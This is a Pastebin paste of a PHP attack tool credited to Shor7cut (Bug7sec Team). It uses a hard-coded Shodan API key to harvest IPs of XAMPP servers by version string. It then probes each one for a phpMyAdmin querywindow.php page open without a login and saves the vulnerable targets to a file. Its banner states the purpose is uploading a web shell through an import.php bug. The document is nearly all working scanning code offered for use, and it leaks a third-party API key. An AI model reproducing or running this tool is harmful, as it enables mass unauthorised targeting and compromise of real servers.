Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- set_time_limit(0);
- date_default_timezone_set('asia/jakarta');
- cover();
- cari_target();
- echo "\r\n--------------------------------------\r\n";
- function cari_target() {
- unlink("target_shor7cut.txt");
- //$name_output = "K-exploit-".date("d-m-Y@his").$extension;
- $name_output = "K-EXPLOIT.HTML";
- // SETTING \\
- $no=1;
- $nos=1;
- $success=0;
- $fail=0;
- $auth=0;
- $dbaru=0;
- $api = "z3cBefrV3bmRx2rNZ0E1opuZxXNPrbIR";
- $name_lapor = "Laporan.txt";
- if($api==""){
- echo "[!] Ops... Get Your api in account.shodan.io\r\n";
- quit();
- }
- $total_target=0;
- // END:SETTING \\
- $dork = array (
- 'xampp',
- 'xampp Apache/2.2.3',
- 'xampp Apache/2.2.4',
- 'xampp Apache/2.2.6',
- 'xampp Apache/2.2.8',
- 'xampp Apache/2.2.9',
- 'xampp Apache/2.2.11',
- 'xampp Apache/2.2.12',
- 'xampp Apache/2.2.14',
- 'xampp Apache/2.2.17',
- 'xampp Apache/2.2.21',
- 'xampp Apache/2.4.2',
- 'xampp Apache/2.4.3',
- 'xampp Apache/2.4.10',
- 'xampp Apache/2.4.12',
- 'xampp PHP/5.2.1',
- 'xampp PHP/5.2.2',
- 'xampp PHP/5.2.3',
- 'xampp PHP/5.2.4',
- 'xampp PHP/5.2.5',
- 'xampp PHP/5.2.6',
- 'xampp PHP/5.2.8',
- 'xampp PHP/5.2.9',
- 'xampp PHP/5.3.0',
- 'xampp PHP/5.3.1',
- 'xampp PHP/5.3.5',
- 'xampp PHP/5.3.8',
- 'xampp PHP/5.4.4',
- 'xampp PHP/5.4.7',
- 'xampp PHP/5.4.31',
- 'xampp PHP/5.5.15',
- 'xampp PHP/5.5.19',
- 'xampp PHP/5.6.3',
- 'xampp PHP/5.5.24',
- 'xampp PHP/5.6.8',
- 'xampp PHP/4.4.5',
- 'xampp PHP/4.4.6',
- 'xampp PHP/4.4.7',
- 'xampp PHP/4.4.8',
- 'xampp PHP/4.4.9'
- );
- $total_dork = count($dork);
- foreach ($dork as $dorks) {
- $noms = "(".$no."/".$total_dork.")";
- echo "(+) Mencari Target : ".$noms."\r\n(+) scanned in ";
- $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api}&query={$dorks}");
- $json = json_decode($get,true);
- foreach ($json['matches'] as $key => $value) {
- $fp = fopen("target_shor7cut.txt", 'a+');
- fwrite($fp, $value['ip_str']."|");
- fclose($fp);
- } // End Foreach
- $target_live = $json['total'];
- if($target_live>100){
- $target_live=100;
- }
- $total_target=$target_live+$total_target;
- echo round((microtime(true)-$_SERVER['REQUEST_TIME_FLOAT']),2)." Seconds | Found -> ".$target_live." \r\n\n";
- $no++;
- }
- echo "[+] Total Target : [".$total_target."]\r\n";
- $buka_file = fopen("target_shor7cut.txt", "r");
- $baca_file = fgets($buka_file);
- $target = explode("|", $baca_file);
- echo "[+] Memulai Mencari vulnerable\r\n";
- loading();
- echo "\r\n";
- $start = date("d-m-Y h:i:sa");
- foreach ($target as $sites) {
- $infos = "Scan : $sites (".$nos."/".$total_target.") - ".$name_output;
- echo "-> Info : (".$nos."/".$total_target.") | [S:".$success."/F:".$fail."/A:".$auth."] (DB: ".$dbaru.")\r\n";
- echo "-> Target : ".$sites."\r\n";
- echo "-> PhpMyadmin : ";
- $url = "http://$sites/phpmyadmin/querywindow.php";
- $phpmyn = curl_init("$url");
- curl_setopt($phpmyn, CURLOPT_FAILONERROR, true);
- curl_setopt($phpmyn, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($phpmyn, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($phpmyn, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($phpmyn, CURLOPT_TIMEOUT, 30);
- $phpmynresult = curl_exec($phpmyn);
- $re = "/<input type=\"hidden\" name=\"token\" value=\"(.*)\"/";
- if(preg_match($re, $phpmynresult, $matches)){
- if(preg_match_all("/pma_password/", $phpmynresult, $matx)){
- echo "Not vulnerable (Auth)\r\n";
- $auth++;
- }else {
- echo "vulnerable\r\n";
- $hasil_output='<a href="'.$url.'" target=_blank>http://'.$sites.'</a><br>';
- //-----------------------------------------------------------------\\
- //--- JIKA ADA TARGET YANG SAMA MAKA DATA TIDAK DI SIMPAN DI DATABASE
- //--- JIKA INGIN MENGHILANGKAN FUNGSI INI SILAHKAN EDIT SENDIRI
- //--- Hapus Script yang sudah saya tandai // START // END
- //--- Ganti dengan Script dibawah ini
- /*
- $fp = fopen($name_output, 'a+');
- fwrite($fp, $hasil_output);
- fclose($fp);
- */
- //-----------------------------------------------------------------\\
- //start
- $buka_file = file_get_contents($name_log);
- if(!eregi($sites, $buka_file)){
- //save result
- $fp = fopen($name_output, 'a+');
- fwrite($fp, $hasil_output);
- fclose($fp);
- //save log
- $fp = fopen("logs_shor7cut.txt", 'a+');
- fwrite($fp, $sites."\r\n");
- fclose($fp);
- echo "-> Save-DB : Telah Ditambahkan\r\n";
- }else {
- echo "-> Save-DB : Tidak Ditambahkan\r\n";
- }
- //end
- $success++;
- }
- }else {
- echo "Not vulnerable\r\n";
- $fail++;
- }
- echo "-> Check Done in ".round((microtime(true)-$_SERVER['REQUEST_TIME_FLOAT']),2)." Seconds\r\n\n";
- $nos++;
- }
- $lapor.= "\r\n\n---------------------------------------\r\n";
- $lapor.= " > LAPORAN AKHIR <\r\n";
- $lapor.= "\r\n---------------------------------------\r\n";
- $lapor.= "-> Total Target : ".$total_target."\r\n";
- $lapor.= "-> Total Success :".$success."\r\n";
- $lapor.= "-> Total fail :".$fail."\r\n";
- $lapor.= "-> Total Auth :".$auth."\r\n";
- $lapor.= "-> Total Target Baru :".$dbaru."\r\n";
- $lapor.= "-> Output File :".$name_output."\r\n";
- $lapor.= "-> Start Scan : ".$start."\r\n";
- $lapor.= "-> End Scan : ".date("d-m-Y h:i:sa");
- echo $lapor;
- $fp = fopen($name_lapor, 'a+');
- fwrite($fp, $lapor);
- fclose($fp);
- loadings();
- } // akhir fungsi
- function loadings() {
- cari_target();
- }
- function loading() {
- echo "-> Pleas wait ";
- for ($i=0; $i <3; $i++) {
- echo ".";
- sleep(1);
- echo " ";
- sleep(1);
- } echo "\r\n";
- }
- function cover() {
- $shor7cut.=" .---. \r\n";
- $shor7cut.=" |---| \r\n";
- $shor7cut.=" |---| \r\n";
- $shor7cut.=" |---| > K-Xploit PhpMyadmin (Multy Killer) < \r\n";
- $shor7cut.=" .---^ - ^---. \r\n";
- $shor7cut.=" :___________: Code By Shor7cut (Bug7sec Team) \r\n";
- $shor7cut.=" | |//| \r\n";
- $shor7cut.=" | |//| [DESCRIPTION] \r\n";
- $shor7cut.=" | |//| Looking for Target using shodan \r\n";
- $shor7cut.=" | |//| Then proceed to search \r\n";
- $shor7cut.=" | |.-| Phpmyadmin which has the bug import.php \r\n";
- $shor7cut.=" |.-'**| So that we can upload shell \r\n";
- $shor7cut.=" \***/ Through the bug import.php \r\n";
- $shor7cut.=" \*/ \r\n";
- $shor7cut.=" V Thank's : Tuban Cyber Team | IndoXploit | ISD-TEAM \r\n";
- $shor7cut.=" Yogyakarta Black Hat | Suram-Crew \r\n";
- echo $shor7cut;
- } ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement